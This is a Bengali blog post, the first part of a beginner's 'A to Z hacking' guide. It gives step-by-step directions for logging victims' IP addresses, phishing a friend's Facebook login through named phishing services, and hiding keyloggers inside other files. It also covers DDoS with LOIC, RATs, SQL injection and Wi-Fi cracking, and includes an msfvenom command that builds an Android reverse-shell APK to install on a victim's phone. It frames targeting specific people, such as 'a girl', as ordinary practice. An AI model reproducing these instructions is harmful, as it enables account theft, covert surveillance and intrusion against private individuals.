Site icon Trickbd.com

নিয়নবাতি [পর্ব-০১] হ্যাকিং বিদ্যার A টু Z শিখুন

Unnamed

হ্যাকার হলো বাস্তব জগতের হিরো, তা হউক নায়ক কিংবা খলনায়ক তবুও হ্যাকার মানেই সিনেমাটিক সেলিব্রেটি কেউ একজন তাই আমাদের প্রায় সবার ভেতরেই হ্যাকার হওয়ার একটা তীব্র অথচ সুপ্ত আগ্রহ বিরাজমান।
আমার এই আর্টিকেলে আজ আমি হ্যাকিং এর শুরু হতে আপাত শেষ পর্যন্ত শেখানোর চেষ্টা করবো( যদিও জেনে রাখুন হ্যাকিং বিদ্যার শুরু আছে কিন্তু এর শেষ নেই) যেন লেখাটি পড়ার পর আপনি নিজে একজন হ্যাকার হতে না পারলেও নূন্যতম পড়া শেষে এতোটুকু স্যাটিসফাইড হতে পারবেন যে আপনি অন্তত হ্যাকিং বিষয়টা সাম্যক অবগত; আপনিও চাইলে হতে পারেন হার্ডহিটার হ্যাকার!!!

হ্যাকিং কি এবং হ্যাকার কে?
সোজাসাপ্টা ভাষায় হ্যাকিং অর্থ “চুরি” এবং যিনি চুরি করেন অর্থাৎ হ্যাকিং করেন তিনিই হলেন “হ্যাকার” তবে প্রচলিত সংজ্ঞা মতে “একজন হ্যাকার হলেন সেই ব্যক্তি যিনি কোন সিস্টেমের নিরাপত্তার দূর্বলতা খুজে তাতে অবৈধ অনুপ্রবেশ করেন” সেটা হতে পারে আপনার কম্পিউটার কিংবা আপনার ব্যাংক একাউন্ট তাতে তফাত নেই; হ্যাকিং জিনিসটা আজ সাইবার স্পেস হতে হিউম্যান সাইকোলজি এতোটা পর্যন্ত বিস্তৃত।
নৈতিকতার দিক থেকে হ্যাকার ৩ প্রকার যথা (১) White Hat Hacker বা সাদা টুপির হ্যাকার যারা মূলত হ্যাকিং বিদ্যার কোন অপব্যবহার করেন না, এদের ইথিক্যাল হ্যাকার বলা চলে। যদিও আজকের দিন ফ্রেশ মানুষই খুজে পাওয়া দায় তাই এমন হ্যাকার খুজে পাওয়া কঠিন বটে তথাপি প্রতিটি সাইবার সিকিউরিটি স্পেশালিষ্ট নিজেই একজন ইথিক্যাল হ্যাকার এমনটা ভাবা দোষনীয় নয় (২) Grey Hat Hacker বা ধূষর টুপির হ্যাকার যারা দ্বৈত চরিত্রের অধিকারী অর্থাৎ এরা চাইলে হ্যাকিং বিদ্যা ভালো কাজেও লাগাতে পারে আর খারাপ কাজেও লাগাতে পারে (৩) Black Hat Hacker বা কালো টুপির হ্যাকার তারাই যারা হ্যাকিং বিদ্যাটার অপব্যবহার করেন।
এছাড়াও যোগ্যতার ও কার্যকলাপের দিক থেকে (১)স্ক্রিপ্ট কিডি যারা অন্যের টুলস/স্ক্রিপ্ট ব্যবহার করে (২) নিওফাইট যারা সবেমাত্র হ্যাকিং বিদ্যা শিখছে (৩) হ্যাকটিভিস্ট যারা হ্যাকিং বিদ্যাকে ধর্মীয় বা রাজনৈতিক ইত্যাদি কাজে ব্যবহার করে এমন বিভিন্ন প্রকারভেদ রয়েছে।

আসুন হ্যাকিং শেখার শুরু করি…..

আইপি এড্রেস:
আইপি এড্রেস ( IP Address= Internet Protocol) হলো ইন্টারনেট জগতে আপানার একটি একক পরিচিতি যা আপনি আপনার সার্ভিস প্রোভাইডার হতে পেয়ে থাকেন। মূলত হ্যাকিং বিষয়ে জানতে হলে সবার আগে এই IP address বিষয়ে জানা আবশ্যক কেননা আপনার ভিক্টিম ( যে সিস্টেমটি হ্যাক করতে চাচ্ছেন) তার সকল তথ্যই লুকায়িত আছে এই IP address এর ভেতর।
আপনি সরাসরি গুগল হতে what is my ip address লিখে টাইপ করলেই আপনি আপনার ip address পেয়ে যাবেন এছাড়া কম্পিউটারে Start->Run-> cmd ->enter হতে IP address পেতে পারেন আবার যেকোনো ওয়েবসাইটের আইপি এড্রেস ও তথ্য পেতে পারেন www.who.is কিংবা http://get-site-ip.com এমন বহু সাইট লাইক সার্চিং টুল হতে।

আইপি এড্রেস হ্যাকিং:
অন্যের আইপি এড্রেস হ্যাক করতে আপনি https://grabify.link/ সাইটে যান এবং যেকোনো একটি ভ্যালিড লিংক ফাঁকা বক্সে দিয়ে creat url ক্লিক করুন > ক্যাপচা পূরন করুন> নতুন পেইজে New URL অংশ কপি করে ভিক্টিমকে পাঠান এবং Access Link নিজের নিকট সংরক্ষন রাখুন এইবার ভিক্টিম আপনার পাঠানো লিংকে ক্লিক করলে আপনি আপনার ঐ Access Link তে প্রবেশ করলেই পেইজের নিচের দিকে আপনি তার IP Address ও অন্যান্য তথ্য পেয়ে যাবেন।
এছাড়াও http প্রটোকল ব্যবহার করে এমন ইমেইল সার্ভিস প্রোভাইডার হলে ইমেইল কর্তার আইপি পেতে Reply> Show Original হতে আপনি তার আইপি হয়তো পেতে পারেন (যদিও বর্তামানে প্রতিষ্ঠিত সকল ইমেইল সার্ভিস প্রোভাইডার https প্রটোকল ব্যবহার করে)।
আবার http://readnotify.com ওয়েবসাইটে রেজিস্ট্রেশন করুন> যার আইপি এড্রেস হ্যাক করতে চান তাকে একটি ইমেইল লিখুন > ইমেইল টু সেকশন এরিয়াতে victim’semailid.rednotify.com  লিখুন > এবার পাঠিয়ে দিন। এবার উক্ত ব্যক্তি যখনই আপনার ইমেইল ওপেন করে পড়বে তখন আপনি আপনার ঐ রিডনোটিফাই একাউন্টে তার আইপি এড্রেস পেয়ে যাবেন।

আইপি এড্রেস হতে লোকেশন ট্রেসিং:
আপনি http://www.ip2location.com এড্রেসে গিয়ে যেকোনো আইপি এড্রেসের লোকেশন ট্রেস করতে পারবেন, এমনকি গুগলে গিয়ে IP address to location finder online লিখলে এমন বহু টুলস পেয়ে যাবেন যেখান হতে আইপি এড্রেসের লোকেশন জানতে পারবেন এমনকি গুগল ম্যাপ/ স্যাটেলাইটে তার অবস্থানও ডিটেক্ট করতে পারবেন।
উল্লেখ্য বাংলাদেশে অনেকেই এমনকি করে আইপি এড্রেস হতে লোকেশন ট্রেস করতে গিয়ে বিব্রত হয়েছেন কেননা আপনি আছেন কুমিল্লাতে আর আইপি লোকেশন দেখায় ঢাকা এমনটা কেন? এটার আসল কারন হলো আপনি আপনার সার্ভিস প্রোভাইডার হতে সাব-আইপি ব্যবহার করছেন আর আপনার লোকেশনও তাই ঐ সাব-আইপি অনুযায়ীই হয়ে থাকে; চাইলে আপনি নিজেও একখানা রিয়েল আইপি এর মালিক হয়ে যেতে পারেন তাহলে আর এসব বালাই রইবে না!

অ্যানেনিমাস হউন:
অ্যানোনিমাস অর্থ আগুন্তুক; মূলত ইন্টারনেট জগতে নিজেকে লুকায়িত করার নামই হলো অ্যানেনিমাস হওয়া। অ্যানেনিমাস মানেই একটা মাস্ক মুখে পড়লেন আর নিজেকে অ্যানোনিমাস হ্যাকার দাবী করলেন এমনটা নয় বরং একজন হ্যাকার স্বইচ্ছাতে/নিজের সুরক্ষাতে নিজেকে আড়াল করার জন্য অ্যানোনিমাস হওয়া পছন্দ করেন।
সবার আগে আপনাকে নিজের আইপি এড্রেস লুকাতে হবে তার জন্য প্রক্সি ব্যবহার করতে পারেন।
মূলত আপনি যখন Google ব্যবহার করেন তখন এমনভাবে তথ্য আদানপ্রদান করা হয় আপনার কম্পিউটার> গুগল সার্ভার> আপনার কম্পিউটার ; তাই এখানে আপনার আইপি এড্রেস সহজেই সনাক্ত করা সম্ভব। কিন্তু আপনি যদি প্রক্সি ব্যবহার করেন এবে তথ্য আদান প্রদান হয় এরূপে আপনার কম্পিউটার > প্রক্সি> গুগল সার্ভার > প্রক্সি > আপনার কম্পিউটার যেখানে আপনার আইডিয়েন্টিফিকেশন ঐ প্রক্সি দ্বারা লুকায়িত থাকে।
প্রক্সি ব্যবহার করতে গুগলে গিয়ে লিখুন free proxy server এরপর সার্চ রেজাল্ট হতে একটি আইপি এড্রেস এবং পোর্ট সংগ্রহ করুন এরপর পিসির ইন্টারনেট এক্সপ্লোরে গিয়ে tools>internet option>connection>lan setting>proxy server> দুটি বক্সে টিক মার্ক দিন এবং বাকি দুটি ঘরে আইপি এড্রেস ও সংশ্লিষ্ট পোর্ট লিখুন > আপনার প্রক্সি নেওয়া সম্পন্ন হয়েছে।
মজিলা ফায়ারফক্সের ক্ষেত্রে tools>options>advanced>network>settings> আইেপি এবং পোর্ট বসান> ok
যদি আপনি এনড্রেয়েডে প্রক্সি নিতে চান তবে গুগলে বহু ফ্রি এবং পেইড VPN পাবেন যা হতে আপনি নিজেকে আড়াল করতে পারেন। আবার অনলাইন প্রক্সি হিসেবে http://www.hidemyass.com/ , https://proxybrowser.xyz/, https://hide.me, http://proxurf.com/, https://kproxy.com/ ওয়েবসাইটগুলো প্রক্সি টুলস হিসেবেও ব্যবহার করতে পারেন।
অ্যামোনিমাস হতে শুধুমাত্র আইপি এড্রেস বদলানো বা প্রক্সি নেওয়ায় এনাফ নয় বরং আপনাকে ম্যাক এড্রেসও পাল্টানো উচিত তথাপি মাস্ক পড়া মানেই অ্যানোনিমাস নয় বরং অ্যানোনিমিটি নির্ভর করে ইন্টারনেট জগতে আপনার বিহ্যাভিউয়ারের ওপর।

ম্যাক এড্রেস:
ম্যাক এড্রেস ( Mac Address =Media Access Control Address) হলো কোন নেটওয়ার্ক ডিভাইসের সানক্তকারী হেক্সাডেসিমেল নাম্বার যা ১২ টি ডিজিটের হয়ে থাকে।
উল্লেখ্য প্রকৃত এ্যানোনিমাস হ্যাকার হতে নিজের সুরক্ষার জন্য কিংবা নিজেকে লুকাতে এই Mac Address পরিবর্তন করতে হয় ( এটা পিসিতে যেমন তেমনি এনড্রোয়েডেও পরিবর্তন করা যায়)। আবার হ্যাকিং জগতে ম্যাক স্পুফিং বিষয়টাও তেমনি প্রসিদ্ধ ; জেনে অবাক হবেন হয়তো একটা সমস এই ম্যাক স্পুফিং হতে ইমু একাউন্ট হ্যাক করা যেত (যদিও আপডেট ভার্সনে তা এখন আর সম্ভবপর নয়)।

সোস্যাল ইঞ্জিনিয়ারিং:
সোস্যাল ইঞ্জিনিয়ারিং মানে সোজা কথাতে চিটিং কিন্তু এই সোস্যালই ইঞ্জিনিয়ারিং হলো হ্যাকিং জগতের সবচেয়ে শক্তিশালী সাইকোলজিক্যাল সফটওয়ার। মনে করুন আপনি একটি মেয়ের আইপি এড্রেস হ্যাক করতে চাচ্ছেন তাহলে তাকে আপনি আইপি লগারের লিংক দিয়ে বলতে পারে যে ঐ লিংকে তার কিছু সিক্রেট ফটো আছে তাহলে সে তাতে এন্টার করতে প্রলুদ্ব হবে; এখানে এই যে মাইন্ড ট্রিক করে তাকে প্রলুব্ধ করলেন সেটাই হলো সোশ্যাল ইঞ্জিনিয়ারিং। মনে রাখুন সোস্যাল ইঞ্জিনিয়ারিং এর কোন ধরাবাধা নিয়ম নেই বরং আপনি যখন যেখাবে যতোটা দক্ষতার সহিত আপনার বুদ্ধিমত্তা এবং ধূর্ততা উপস্থাপন করবেন আপনার সফল হওয়ার সম্ভাবনা ততোই বাড়বে।

ফিশিং :

ফিশিং হলো এক প্রকার মাছ ধরা যেখানে আপনি টোপ দিয়ে মাছের মতোই ভিক্টিমকে ধরবেন আর আপনার হ্যাকিং এক্টিভিটি সম্পন্ন করবেন। যেকোনো ওয়েবসাইটের একটি নকল পেইজ তৈরী করে তাতে ভিক্টিমের লগিন ইনফো এবং অন্যান্য তথ্য হাতিয়ে নিতে index.html হলো ফেইক পেইজ run.php হলো কন্টেন্ট কনট্রোল id.txt লগিন ডাটা ইত্যাদি ফাইলগুলা আপনার হোস্টিং সাইটে কাজ করে।
সোজা ভাষায় ফিশিং বুঝতে পারেন “ধরুন আপনি আপনার বন্ধুর ফেসবুক একাউন্ট হ্যাক করতে চাচ্ছেন তাহলে তাকে এমন একটি লিংক দিন যার ওয়েব পেইজটি দেখতে হবহু ফেসবুকের মতোন এবং তাকে প্রলুব্ধ করুন যাতে তিনি তাতে লগিন করেন তাহলেই আপনি আপনার ঐ ফিশিং একাউন্টে তার লগিন ইনফো তথা পাসওয়ার্ড পেয়ে যাবেন”।
আপনি যেকোনো হোস্টিং সাইটে যেকোনো ওয়েবপেইজের সোর্সকোড হতে ফাইল তৈরী করে ফিশিং পেইজ তৈরী করতে পারেন তথাপি ফিশিং নির্ভর করে আপনার সোস্যাল ইঞ্জিনিয়ারিং এর দক্ষতার ওপর।
এছাড়া নিজে কষ্টসাধ্য ফিশিং সাইট তৈরী করার পরিবর্তে আপনি www.anomor.com সাইটে রেজিট্রেশন করে জিমেইল ফেসবুক সহ বিভিন্ন প্রকার ফিশিং লিংক পেতে পারেন আর ভিক্টিমের লগিন ডাটা( পাসওয়ার্ড, ইউসার নেম, আইপি এড্রেস) পাবেন victim ফোল্ডারে। আবার স্পেসিফিক ফেসবুক একাউন্ট হ্যাক করার জন্য http://shadowave.com [ http://shadowave.info/ ] এবং http://z-shadow.info/m/ ওয়েবসাইট ব্যবহার করতে পারেন।

কিলগার:
কিলগার হলো এমন একটি সিস্টেম যেখানে ভিক্টিম তার পিসি/মোবাইল যা কিছু টাইপ করবে তা আপনি জানতে পারবেন এবং লেটার এনালাইসিস হতে ভিক্টিমের ওয়েবসাইট, ফেসবুক, ব্যাংক একাউন্ট তথায় ভিক্টিম সিস্টেম হ্যাক করতে পারবেন।
কম্পিউটারের ক্ষেত্রে আপনি আর্মাডেস্ক ব্যাবহার করতে পারেন।আপনার কিলগার’টিকে আপনি ভিন্ন ফাইলের সাথে বাইন্ড করপ দিতে পারেন যাতে ভিক্টিমের অজান্তেই তার সিস্টেম এট্যাক করা সম্ভব হয়, এছাড়া আপনি ট্রোজান ব্যবহার করতে পারেন [ মূলত ট্রোজান হলো ভিক্টিম সিস্টেমে থাকা এমন একটি প্রোগাম যা অনেকটা ভাইরাসের মতো বংশ বিস্তার করে এবং ভিক্টিম সিস্টেম সম্পর্কে হ্যাকার’কে নিয়ত তথ্য প্রদান করে]।
অবলাইন কিলগার হিসেবে এনড্রোয়েডের জন্য https://www.hoverwatch.com/free-android-keylogger ব্যবহার করতে পারেন। আবার Hacker Keyboard ব্যবহার করতে পারেন [ ডাউনলোড → http://url.ie/12mht ] এছাড়াও Hacker Keylogger App ব্যবহার করতে পারেন [ ডাউনলোড → http://url.ie/12mhr ]।

ব্রুটফোর্স এট্যাক:
কোন সিস্টেমেরর লগিন প্যানেলে ইউসার আইডি এবং সম্ভাব্য পাসওয়ার্ড একে একে এন্টার করে তাতে লগিন করার চেষ্টার নামই ব্রুটফোর্স এট্যাক।
মূলত এমন ব্রিটফোর্স এট্যাক সময় স্বাপেক্ষ এবং অনিশ্চিত সম্ভাবনাময় তথাপি এমন এট্যাক রুখতে ক্যাপচা অপশন রাখা হয় যাতে কোন প্রোগাম ঐ সিস্টেমে রোবটিকভাবে এট্যাক করতে না পারে।
কম্পিউটার হতে ব্রুটফোর্স এট্যাক দিতে আপনি আলাদা সফটওয়ার এর পাশাপাশি লিনাক্স ব্যবহার করতে পারেন আর এনড্রোয়েডে টার্মিনাল ব্যবহার করতে পারেন।
ব্রুটফোর্সে সফল হওয়া নির্ভর করে পাসওয়ার্ড লিস্টের ওপর তাই অটোমেটিক ব্রুটফোর্সের চেয়ে কাস্টম পাসওয়ার্ড লিস্ট ( create aassword by analysis of victim’s nature & behave) তৈরী করে ম্যানুয়াল ব্রুটফোর্স এট্যাক দিলে সফলতার সম্ভাবনা ৯০% বেড়ে যায়।

ব্রুটফোর্স নিয়ে ফাজলামি:
ধরুন আপনি করিমের ফেসবুক আইডি হ্যাক করতে চাইছেন, এবং মনে মনে তার আইডির পাসওয়ার্ড ধরলেন iloveyou এবার লগিন করে দেখুন তাহলে ৯৯.৯৯% সম্ভাবনা রইবে যে আপনি ফেইল হবেন। তবে এই iloveyou লেখাটি যে জগতে কারোরই পাসওয়ার্ড নয় এমনটা তো নিশ্চিত করে বলতে পারেন না তাই একই পাসওয়ার্ড কনস্ট্যান্ট রেখে নিভিন্ন আইডিতে তার আইডি কোড দিয়ে ব্রুটফোর্স এট্যাক দিলে কেমন হয় বলুন তো???
এক্ষেত্রে কমন ওয়ার্ড হলো এট্যাকিং পাসওয়ার্ড এবং আইডি কোড লিস্ট হলো টার্গেট একাউন্টের সমন্বয় মাত্র।
হ্যাকিং কখনো মনের অহংকারে থাকে না; হ্যাকিং থাকে মাথার ব্রেইনে!

DOS/DDOS এট্যাক:
ডস (ডেনাইয়াল অফ সার্ভিস) এবং ডিডস (ডিসট্রিবিউটেড ডেনাইয়্যাল অব সার্ভিস) এট্যাক হলো কোন ওয়েবসাইটে অতি অল্প সময়ের জন্য আগণিত ডাটা প্যাকেট/প্যাকেজ পাঠিয়ে তাকে সময়িক সময়ের জন্য ডিস্ট্রয় করে দেওয়া তথা সার্ভার ডাউন করিয়ে দেওয়া যাতে ঐ সাইটে কেউ ভিজিট করতে না পারে।
যেমন মনে করি একটি ওয়েবসাইট হলো ABC যার হোস্টিং সার্ভারে Bandwidth 1GB/Day ; Hits 10000/day; max needed bandwidth lese then 400 mb/day এখন ঐ সাইটে যদি ১ ঘন্টাতে একটি ফলস স্ক্রিপ্ট হতে 25000 hit করা যাতে ব্যান্ডউইথ 1GB পার হয় তবে ঐ সাইট’টি সাময়িক সময়ের জন্য স্থবির হয়ে পড়বে এবং তাতে কেউ ঐ সাইটে ভিজিট করতে পারবে না এককথায় এটিই হলো DDOS এট্যাক।
কম্পিউটারে আলাদা সফটওয়ার ছাড়াও লিনাক্স কমান্ড হতে এমন ডিডস এট্যাক দেওয়া যায় আবার এনড্রোয়েডে LOIC App ( গুগলে সার্চ করলেই পাবেন; এর পিসি ও এনড্রোয়েড দুটি ভার্সনই আছে ) হতে যেকোনো সাইটে ডিডস এট্যাক দেওয়া যায় এমনকি টার্মিনাল হতেও এনড্রোয়েড মোবাইল দ্বারা ডিডস এট্যাক পরিচালনা করা যায়।
মূলত গ্রুপ হিসেবে কাজ করলে এমন ডিডস এট্যাক খুব সহজেই হ্যাকিং হানা দিতে পারে যেকোনো ওয়েবসাইটে ( উন্নত এডভান্স ওয়েবসাইটগুলোর হোস্টিং সার্ভারে এজন্যই ডিডস প্রতিরোধক ব্যবস্থা করা থাকে)।

RAT:
RAT (Remote Administration Tool) হলো এমন একটা ভাইরাস যা ইদুরের মতো যেকোন কম্পিউটারের প্রবেশ করে তার যাবতীয় এক্সেস নিতে সক্ষম যেন পিসির ক্যামেরা বা স্কিন কচাপচারিং,ফাইল এক্সেস বা এনালাইসিস করা,শেল আপলোডিং, পিসি কনট্রোল ইত্যাদি উদাহরণস্বরূপ ট্রোজান হর্স ভাইরাস কোন ফাইল ডাউনলোড/আপলোড/ডিলিট বা রিনেম করা,ড্রাইভ ফরম্যাট করা,সিডি/ডিভিডি রোম অটো ওপেন করা,পিসিতে ভাইরাস বা ওয়ার্ম ছেড়ে দেয়া,কী-স্ট্রোক লগ বাইপাস করা,পাসওয়ার্ড বা ক্রোডিট কার্ড নাম্বার হ্যাক করা,ওয়েবসাইটের হোমপেজ হাইজ্যাক করা,অটো স্ক্রিন ক্যাপচার করা,টাস্কবারে অটো কোন টাস্ক রান/ডিলিট করা,ডেস্কটপ, টাস্কবার বা কোন ফাইল লুকিয়ে ফেলা 
,কোন টেক্সট কমান্ডবিহীনভাবে প্রিন্ট করা,অটো সাউন্ড প্লে করা,মাউসের কার্সরের অস্বাভাবিক নড়াচড়া,সংযোগকৃত মাইক্রোফোনের সাউন্ড অটো রেকর্ড করা,ওয়েবক্যামের মাধ্যমে অটো ভিডিও রেকর্ডিং করা ইত্যাদি এক্টিভিটিতে পারদর্শী।
বিভিন্ন RAT এর মাঝে উল্লেখযোগ্য Shark ,Bifrost ,Bandook ,BO2K ,ProRAT ,SpyRAT,HackRAT ,Netbos ,Optixe ,AutoSpY ,Nclear ,Amituer , Bandk, Yuri RAT,Y3k RAT,slha RAT,Openx RAT,Poison Ivy RAT,Mosucker,SubSeven RAT,Nuclear RAT,NetBus RAT,ProRAT,megapanzer ,LanHelper ইত্যাদি।

সেশন হাইজ্যাক:
সেশন হাইজ্যাক হলো ভিক্টিমের ব্রাউজারের কুকিজ চুরি করে তার সেশনে পার্টিসিপেশন করা এবং এক্সেস নেওয়া, এমনটা হতে পারে একই নেটওয়ার্কে অবস্থিত দুটি ভিন্ন ব্রাউজারে কুকিজ স্টিলিং দ্বারা তথাপি https প্রটোকলে ডাটা এনক্রিপশন চালু থাকলে তা অসম্ভব প্রায়; ঠিক সেই কারনে একটি প্রচলিত হ্যাকিং এর নাম শোনা যেত যে যখন ফেসবুক http প্রটোকল ব্যবহার করতো তখন ফেসনিফ হতে অন্যের ফেসবুক আইডিতে নাকি এক্সেস নেওয়া যেত।

ডোমেইন হাইজ্যাক:
যেকোন ওয়েবসাইটের ডেমেইনটিকে হ্যাক করে তার হোস্টিং সার্ভার হতে আলাদা করে হ্যাকারের ইচ্ছামতো হোস্টিং সাইটে প্রতিস্থাপন করাই হলো ডোমেইন হাইজ্যক যার জন্য সবার আগপ ডোমেইন রেজিস্ট্রেশন ইনফো তার ইমেইল এড্রেস জেনে তা হ্যাক করতে হয় এবং ডোমেইনটি কুক্ষিগত করতে হয় অতঃপর তা হ্যাকারের হোস্টিং এর সাথে যুক্ত করা হয়।

ওয়েবসাইট হ্যাকিং:
যেকোন ওয়েবসাইটের সার্ভারে এট্যাক করার কতোগুলি উপায় থাকে যেমন এসকিউএল ইনজেকশন, পিএইচপি রিমোট এক্সিকিউশন, ওয়েব রিপিং, গুগল হ্যাকিং।
এসকিউএল ইনজেকশন হলো কোন ওয়েবসাইটের ডাটাবেজ এসকিউএল ভার্নাবল হলে ( ওয়েব লিংকের শেষে একটি ‘ ব্যবহার করে দূর্বলতা চেক করা যায়) তাতে নিয়ত এসকিউএল ইনজেক্ট করে তার এডমিন কলাম হতে ইউজার নেম এবং এনক্রিপ্টেড পাসওয়ার্ড সংগ্রহ করা হয় পরে ঐ পাসওয়ার্ড ডিক্রিপ্ট করা হয় এবং এডমিন প্যানেল ফাইন্ডার হতে এডমিন প্যানেল খুজে সেখানে ইউজার আইডি ও পাসওয়ার্ড দ্বারা পুরো সাইটের এক্সেস নেওয়া হয়।
এমন একসিউএল ইনজেক্ট করার জন্য পিসি এবং এনড্রোয়েড ভার্সনে বহু সফটওয়ার ও এপ্স গুগল ঘাটলেই পাবেন তথাপি মেম্যুয়ালি ব্রাউজারের ইউআরএল হতেও এমন এট্যাক করা যায় যা নিতান্ত সময়স্বাপেক্ষ।
আবার এডমিন প্যানেল ফাইন্ড আউট করার জন্য পিসির জন্য হাভিজ ছাড়াও অনলাইন বহু এডমিন প্যানেল ফাইন্ডার আছে।আবার ম্যানুয়ালিও আপনি ইউআরএল এনালাইসিস করে এডমিন প্যানেল খুজতে পারেন।

যদিওবা এই এসকিউএল ইনজেকশন পদ্ধতিটি একটু বিরক্তিকর রকমের জটিল আর সময়সাপেক্ষ তবুও এর জনপ্রিয়তা এবং ব্যবহার হ্যাকার সমাজে খুবই প্রসিদ্ধ।

ফেসবুক আইডি হ্যাকিং
আদতে একজন সত্যিকারের হ্যাকার কখনোই নিজেকে ফেসবুক আইডি হ্যাকার পরিচয় দিয়ে গর্ববোধ করতে পারেনা তথাপি ফেসবুক সার্ভার হ্যাক আর ফেসবুক আইডি হ্যাক একই বিষয় নয়; উপরোক্ত নিময়গুলা যদি ভালোমতো প্রাকটিস করেন তবে শুধু ফেসবুক একাউন্ট নয় বরং যেকোন ওয়েবসাইট বা সিস্টেম হ্যাক করা বিষয়ে আপনি নূন্যতম হলেও পারদর্শী হতে পারবেন। তবুও উল্লেখ্য ফেসবুক আইডি হ্যাক করতে ফিশিং, কিলগার, ডিভাইস এক্সেস, সোস্যাল ইঞ্জিনিয়ারিং, স্পুফিং ইত্যাদি বিভিন্ন উপায়ে অন্যের ফেসবুক আইডি হ্যাক করতে পারবেন।

ওয়াইফাই হ্যাকিং:
ওয়াইফাই হ্যাক করতে পারবেন পিসিতে কালি লিনাক্স কিংবা এনড্রোয়ডে টার্মিনালের কমান্ড হতে, উইন্ডোজে Aircrack-ng, wpa wps connector এপ্স, wifi map, এনড্রোয়েডে সেভ থাকা পাসওয়ার্ড শো করাতে ES File explorer file manager এপ্স, পিসিতে সেভ থাকা পাসওয়ার্ড দেখতে উইন্ডোজ এডমিনিস্ট্রেশন কমান্ড prompt ওপেন করে টাইপ করুন netsh wlan show profile name= WIFI NAME/SSID key=clear তাহলে পাসওয়ার্ড দেখতে পাবেন, পিসিতে Windows Wifisla কিংবা রাউটারে আইপি এড্রেসের গেটওয়ে ডিফল্ট থাকলে আপনি ওয়াইফাই হ্যাক করতে পারবেন।
এছাড়াও ব্রুট ফোর্স এট্যাক কিংবা কি লগার অথবা হিডেন স্ক্রিন রেকর্ডার এপ্স ব্যবহার করেও কৌশলে ওয়াইফাই হ্যাক করতে পারেন।
একটা মজার কথা বলি শুনবেন?
প্রকৃত লীট হ্যাকারেরা ওয়াইফাই হ্যাক করে ফ্রি নেট ব্যবহার করার জন্য নয় বরং তারা ঐ নেটওয়ার্কে এক্টিভ কম্পিউটার বা সিস্টেম হানা দেবার জন্যই ওয়াইফাই হ্যাক করে থাকে, সুতরাং নিজে বড় হতে হলে আগে নিজের নজরটাকে বড় করা উচিত!

এনড্রোয়েড হ্যাকিং:
অন্যের এনড্রোয়েড মোবাইল হ্যাক করার জন্য রিমেটিক এক্সেস পেতে https://web.airdroid.com/ ব্যবহার করতে পারেন( এমন অনেক সাইট আছে যেখান হতে আপনি অন্যের এনড্রোয়েড মোবাইল হ্যাক করার জন্য এমন রিমোটিক এক্সেস পেতে পারেন যেমন https://www.cerberusapp.com/ ইত্যাদি), আবার ইন্টারনেট কানেকশন ছাড়াই এনড্রোয়েড মোবাইল হ্যাক করতে Tickle My Phone এপ্স ব্যবহার করতে পারেন। আবার মেটাস্পলেয়ট প্লেলোড হতে $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > /sdcard/Hack.apk উক্ত কামান্ড ব্যবহার করে Hack.apk টি ভিক্টিম এনড্রোয়েডে ইনস্টল করে আপনি এক্সেস পেতে পারেন।
এমনি আরও আরও এনড্রোয়েড হ্যাকিং ট্রিক রয়েছে আপনারই ব্রেইনের নিইরনে নিউরনে শুধু একটু মাথা খাটিয়ে ইনভেনশনস করার ব্যাপার মাত্র; মনে রাখুন হ্যাকিং কখনো বই পুস্তকে লেখা থাকেনা বরং হ্যাকিং জন্ম নেয় বুদ্ধিমানের মাথাতে আ নৈতিকতা থাকে মনে তাইতো একজন ইথিক্যাল হ্যাকারই সত্যিকারের লীট হ্যাকার হওয়ার গৌরব অর্জন করার যোগ্যতা রাখেন।

এই লেখাটি লেখার অনুপ্রেরণা:
আমি জন্মগত হ্যাকিং-এ- হাফেজ হয়ে জন্মায়নি বরং আমিও ইন্টারনেট ঘেটে ঘেটে হ্যাকিং শেখার চেস্টা করেছি এবং এখনো করছি মাত্র; তাই এতোবড় লেখাটি লিখতে আমার কষ্ট হলেও ক্রেডিট সেই সমস্ত হ্যাকিং হ্যাকিং টিচার যারা ইন্টারনেটে নিজেদের জ্ঞান উজার করে দিয়েছেন। বিশেষত টেকটিউনসের মেহেদী হাসান ভাইয়ের হ্যাকিং টিউটোরিয়াল গুলো হতে আমার হ্যাকিং বিদ্যার সূচনা তাই দ্ব্যার্থহীনভাবে তাকে সম্মান জানচ্ছি।
আজকের দিনে বাংলাদেশের সাইবার স্পেসে এই “সম্মান দেওয়া” জিনিসটা প্রায় উঠে গিয়েছে তাইতো এতো পরনিন্দা আর অন্যকে ছোট করার হীন প্রচেষ্টা যা কখনোই একজন আদর্শবান হ্যাকারের বিহ্যাভ হতে পারেনা।
অন্যের নিকট সম্মান পাওয়ার আশা করলে আগে তাকে সম্মান করতে শিখুন।

আমার কাছ থেকে হ্যাকিং শিখবেন??
দেখুন আমরা কেউ হয়তো হ্যাকিং এর দুই/একটা ট্রিক শেয়ার করলেই অন্যরা আব্দার করেন যে “ভাইয়া হ্যাকিং শেখান”। আচ্ছা আপনি কি আমার নিকট হ্যাকিং শিখবেন নাকি আমি যার নিকট হ্যাকিং শিখেছি সেই মহান শিক্ষকের নিকট হ্যাকিং শিখবেন??
আমার টিচার হলো ইন্টারনেট তাই আপনিও হ্যাকিং শেখার শুরুটা করুন ইন্টারনেট হতেই।
কিন্তু সবকিছু শেখার জন্যই একজন পথপ্রদর্শক দরকার হয় ; হ্যাকিং এর বেলায় শুরুতে তাকে গুরু মানলেও শেখা শেষে তাকেই গরু বানিয়ে দেবার মতোন জঘন্য মানসিকতা থাকলে আপনি কখনোই পরিপূর্ণ শিক্ষা লাভ করতে পারবেন। সুতরাং গুরুকে অতিভক্তি করা আদিক্ষেতার প্রয়োজন নেই তারচেয়ে একটু উদার মানসিকতা আর নূন্যতম সৌজন্যতা থাকলে শুধু হ্যাকিং বিদ্যা নয় বরং আপনি লাইফের সকল ক্ষেত্রেই সফল হতে পারবেন।

শেষকথা:
আপনার সর্বাঙ্গীণ উন্নতি এবং সফলতা কামনা করছি। মনে রাখবেন জীবনে সফল হতে হলে শিক্ষার বিকল্প নয় সুতরাং শেখার শুরুটা আজই আরম্ভ করুন কালকের সফলতা আপনার জন্য অপেক্ষা করছে!
ফেসবুকে আমার বন্ধু হওয়ার নিমন্ত্রণ রইলো → https://facebook.com/mr.nishan.ahammed.neon

[উল্লেখ্য এটা কপি পেস্ট নয় বরং লেখাটি আমার সর্বপ্রথম প্রকাশিত হয় টেকটিউনসে নিয়নবাতি শিরোনামে চেইন টিউন এর পর্ববিশেষ হিসেবে]

আল্লাহ হাফেজ